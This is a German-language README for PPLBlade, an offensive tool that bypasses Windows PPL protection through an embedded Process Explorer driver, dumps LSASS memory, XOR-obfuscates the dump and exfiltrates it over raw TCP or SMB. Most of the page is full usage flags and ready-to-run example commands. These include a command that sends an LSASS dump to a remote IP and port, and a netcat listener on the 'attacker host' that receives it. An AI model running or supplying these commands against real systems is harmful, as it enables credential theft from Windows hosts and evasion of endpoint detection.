
Umgeht den PPL-Schutz, um den LSASS-Prozessspeicher auszulagern, verschleiert Dump-Dateien mit XOR und exfiltriert sie remote über RAW oder SMB, ohne auf die Festplatte zu schreiben.
Protected Process Dumper Tool, das das Verschleiern von Speicherabbildern und deren Übertragung auf entfernte Arbeitsstationen unterstützt, ohne sie auf die Festplatte zu schreiben.
Wichtige Funktionen:
Eine Übersicht über die in diesem Tool verwendeten Techniken finden Sie hier: https://tastypepperoni.medium.com/bypassing-defenders-lsass-dump-detection-and-ppl-protection-in-go-7dd85d9a32e6
Beachten Sie, dass PROCEXP15.SYS in den Quelldateien für Kompilierungszwecke aufgeführt ist. Es muss nicht zusammen mit der PPLBlade.exe auf dem Zielcomputer übertragen werden.
Es ist bereits in die PPLBlade.exe eingebettet. Der Exploit ist nur eine einzelne ausführbare Datei.
Modi:
Handle-Modi:
Usage of PPLBlade.exe:
-driver string
Path where the driver file will be dropped (default: current directory)
-dumpmode string
Dump mode [local|network] (default "local")
-dumpname string
Name of the dump file (default "PPLBlade.dmp")
-handle string
Method to obtain target process handle [direct|procexp] (default "direct")
-help
Prints this help message
-ip string
IP of the remote server
-key string
XOR Key for obfuscation (default "PPLBlade")
-mode string
Kill or Dump process [dump|decrypt|cleanup|dothatlsassthing] (default "dump")
-name string
Process name of target process
-network string
Method for network transfer[raw|smb] (default "raw")
-obfuscate
Obfuscate dump file
-pass string
SMB password
-pid int
PID of target process (prioritized over process name)
-port int
PORT on the remote server
-quiet
Quiet mode
-service string
Name of the service (default "PPLBlade")
-share string
share name
-user string
SMB username
Examples:
PPLBlade.exe --mode dothatlsassthing
PPLBlade.exe --mode dump --name lsass.exe --handle procexp --obfuscate --dumpmode network --network raw --ip 192.168.1.17 --port 1234
PPLBlade.exe --mode decrypt --dumpname PPLBlade.dmp --key PPLBlade
PPLBlade.exe --mode cleanup
Beispiele:
Einfacher PoC, der PROCEXP152.sys zum Dumpen von lsass verwendet:
PPLBlade.exe --mode dothatlsassthing
(Beachten Sie, dass es die Dump-Datei nicht XOR-verschlüsselt; fügen Sie ein zusätzliches --obfuscate-Flag hinzu, um die XOR-Funktionalität zu aktivieren)
Laden Sie den verschleierten LSASS-Dump auf einen entfernten Speicherort hoch:
PPLBlade.exe --mode dump --name lsass.exe --handle procexp --obfuscate --dumpmode network --network raw --ip 192.168.1.17 --port 1234
Angreifer-Host:
nc -lnp 1234 > lsass.dmp
python3 deobfuscate.py --dumpname lsass.dmp
Entschleiern des Speicherabbilds:
PPLBlade.exe --mode descrypt --dumpname PPLBlade.dmp --key PPLBlade